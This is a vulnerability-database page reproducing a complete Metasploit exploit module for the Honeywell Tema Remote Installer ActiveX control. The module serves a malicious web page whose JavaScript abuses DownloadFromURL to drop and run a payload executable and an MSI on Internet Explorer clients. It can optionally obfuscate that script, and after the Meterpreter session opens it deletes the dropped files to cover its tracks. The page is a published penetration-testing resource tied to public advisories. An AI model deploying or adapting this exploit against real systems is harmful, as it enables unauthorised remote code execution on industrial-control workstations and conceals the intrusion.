Lucene search
+L

Honeywell Tema Remote Installer ActiveX Remote Code Execution

🗓️ 08 Jan 2013 16:46:31Reported by Billy Rios, Terry McCorkle, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 32 Views

Honeywell Tema ActiveX Remote Installer code executio

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Honeywell Tema Remote Installer ActiveX Remote Code Execution",
        'Description' => %q{
          This module exploits a vulnerability found in the Honeywell Tema ActiveX Remote
          Installer.  This ActiveX control can be abused by using the DownloadFromURL()
          function to install an arbitrary MSI from a remote location without checking source
          authenticity or user notification. This module has been tested successfully with
          the Remote Installer ActiveX installed with Honeywell EBI R410.1 - TEMA 5.3.0 and
          Internet Explorer 6, 7 and 8 on Windows XP SP3.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Billy Rios', # Vulnerability discovery
          'Terry McCorkle', # Vulnerability discovery
          'juan vazquez' # Metasploit
        ],
        'References' => [
          [ 'OSVDB', '76681' ],
          [ 'BID', '50078' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-285-01' ]
        ],
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500
        },
        'DefaultOptions' => {
          'EXITFUNC' => "none",
          'InitialAutoRunScript' => 'migrate -k -f'
        },
        'Platform' => 'win',
        'Targets' => [
          # HoneyWell EBI R410.1 - TEMA 5.3.0
          # Tema_RemoteInstaller.ocx 1.0.0.0
          [ 'Automatic', {} ]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2011-10-20',
        'DefaultTarget' => 0,
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_delete_file
              stdapi_sys_config_getenv
            ]
          }
        }
      )
    )

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ]
    )

    self.needs_cleanup = true
  end

  def exploit
    @dropped_files = [
      'payload.exe',
      'ThinClient_TemaKit.msi',
      'ThinClient_TemaKit.log'
    ]
    super
  end

  def on_new_session(session)
    if session.type == "meterpreter"
      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")

      @dropped_files.each do |file|
        win_file = file.gsub("/", "\\\\")
        begin
          wintemp = session.sys.config.getenv('WINDIR')
          win_file = "#{wintemp}\\Temp\\#{win_file}"
          # Meterpreter should do this automatically as part of
          # fs.file.rm().  Until that has been implemented, remove the
          # read-only flag with a command.
          session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
          session.fs.file.rm(win_file)
          print_good("Deleted #{file}")
          true
        rescue ::Rex::Post::Meterpreter::RequestError
          print_error("Failed to delete #{win_file}")
          false
        end
      end
    end
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']

    # Windows 7 isn't normally supported because the user won't have write access to the
    # %WINDIR%/Temp directory, where the downloaded components are stored.
    if not (agent =~ /MSIE \d/ and agent =~ /NT 5\.1/) and agent !~ /Tema_RemoteInstaller/
      print_error("Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    # exec_payload.msi needs it to be named payload.exe
    # atm there isn't msi generation on the fly
    if request.uri =~ /payload\.exe$/
      return if ((p = regenerate_payload(cli)) == nil)

      data = generate_payload_exe({ :code => p.encoded })
      print_status("Sending payload")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    if request.uri =~ /\.msi$/
      msi_source = ::File.join(Msf::Config.data_directory, "exploits", "exec_payload.msi")
      source = ::File.open(msi_source, "rb") { |fd| fd.read(fd.stat.size) }
      print_status("Sending msi")
      send_response(cli, source, { 'Content-Type' => 'application/octet-stream' })
      return
    end

    if agent =~ /MSIE 6/
      # The 'setTimeout' trick allows to execute the installer on IE6 even if the user
      # doesn't click the warning popup when downloading the payload.
      # The ThinClient_TemaKit.msi installer name must be static.
      # <object id="obj" classid="clsid:E01DF79C-BE0C-4999-9B13-B5F7B2306E9B">
      js = <<-EOS
      var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
      setTimeout("obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');", 1000);
      obj.DownloadFromURL('#{get_uri}/payload.exe');
      EOS
    else
      js = <<-EOS
      var obj = new ActiveXObject('Tema_RemoteInstaller.RemoteInstaller');
      obj.DownloadFromURL('#{get_uri}/payload.exe');
      obj.DownloadFromURL('#{get_uri}/ThinClient_TemaKit.msi');
      EOS
    end

    js.gsub!(/\t\t\t/, "")

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate(memory_sensitive: true)
    end

    html = <<-EOS
    <html>
    <body>
    </object>
    <script>
    #{js}
    </script>
    </body>
    </html>
    EOS

    print_status("Sending html")
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation